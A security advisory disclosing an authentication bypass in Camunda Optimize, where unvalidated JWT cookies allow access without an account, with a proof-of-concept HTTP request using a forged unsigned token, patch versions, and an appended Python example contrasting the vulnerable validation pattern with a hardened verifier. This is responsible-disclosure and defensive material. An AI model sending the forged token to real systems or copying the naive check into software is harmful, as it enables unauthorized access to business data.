Advisory ID: SYSS-2025-038
Product: Camunda Optimize
Manufacturer: Camunda Services GmbH
Affected Version(s): <= 8.6.9 or <= 8.7.2
Tested Version(s): 8.6.1
Vulnerability Type: Improper Authentication (CWE-287)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2025-05-28
Solution Date: 2025-06-17
Public Disclosure: 2025-07-17
CVE Reference: Not yet assigned
Author of Advisory: Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Camunda Optimize enables process evaluation as a part of the Camunda
platform.

The manufacturer describes the product as follows (see [1]):

"Camunda Optimize enables a strategic conversation and collaboration
between business and IT, centered around processes that align with
company goals and objectives. Show the reality of what’s working in your
process—and what needs improvement—using expressive dashboards created
with your process data."

Due to improper authentication, Camunda Optimize is vulnerable to a
complete authentication bypass.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Camunda Optimize relies on JSON Web Tokens (JWTs) transmitted as a
cookie for authentication. Since the JWT is not properly validated, the
application and its data are accessible without a valid user account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Issue a request with a JWT such as {}.{"sub":"test"}, i.e. an empty
header, an unsigned payload and no signature segment at all.

GET /api/process/overview? HTTP/2
Host:
Cookie: X-Optimize-Authorization=e30.eyJzdWIiOiJ0ZXN0In0=.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Optimize-Client-Timezone: Europe/Berlin
X-Optimize-Client-Locale: en

Observe that the application returns valid data even though no valid
authentication information was sent.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to Camunda Optimize 8.6.10 or 8.7.3.

More information can be found at
https://docs.camunda.io/docs/next/reference/notices/#notice-20.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-05-23: Vulnerability discovered
2025-05-28: Vulnerability reported to manufacturer
2025-06-17: Patch released by manufacturer
2025-07-17: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Camunda Optimize
    https://camunda.com/platform/optimize/
[2] SySS Security Advisory SYSS-2025-038
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-038.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en
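Added example (not part of the advisory and not Camunda's code) contrasting the validation failure described in the Vulnerability Details and PoC sections with a correct check: the naive function reads "sub" straight out of the payload and therefore accepts the advisory's unsigned token, while the hardened verifier pins the algorithm server-side, demands a signature segment and compares it in constant time. The cookie name, the HS256 algorithm and the demo key are assumptions for illustration; only the token itself comes from the advisory.

```python
import base64
import hashlib
import hmac
import json

# Token from the advisory's PoC: header {}, payload {"sub":"test"}, empty signature.
POC_TOKEN = "e30.eyJzdWIiOiJ0ZXN0In0=."
# Constructed demo key; a real deployment loads its signing secret from configuration.
DEMO_KEY = b"constructed-demo-key-not-a-real-secret"


def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def naive_subject(token: str) -> str:
    # Vulnerable pattern: trust 'sub' from the payload without ever checking the signature.
    return json.loads(b64url_decode(token.split(".")[1]))["sub"]


def verify_hs256(token: str, key: bytes) -> dict:
    # Hardened check: three segments, server-pinned algorithm, mandatory signature,
    # constant-time comparison. Raises ValueError on any failure.
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must have exactly three segments")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        raise ValueError("unexpected or missing alg")
    if not sig_b64:
        raise ValueError("missing signature")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(sig_b64), expected):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(payload_b64))


def accepts(token: str, key: bytes) -> bool:
    try:
        verify_hs256(token, key)
        return True
    except ValueError:  # covers JSON and base64 decode errors as well
        return False


def sign_hs256(claims: dict, key: bytes) -> str:
    # Issue a correctly signed token so the verifier can be exercised end to end.
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload_b64 = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"
```

For detection, the same structural checks make a useful log signal: a cookie whose JWT has an empty signature segment or a header without the expected alg should never reach the application and is worth alerting on at the proxy.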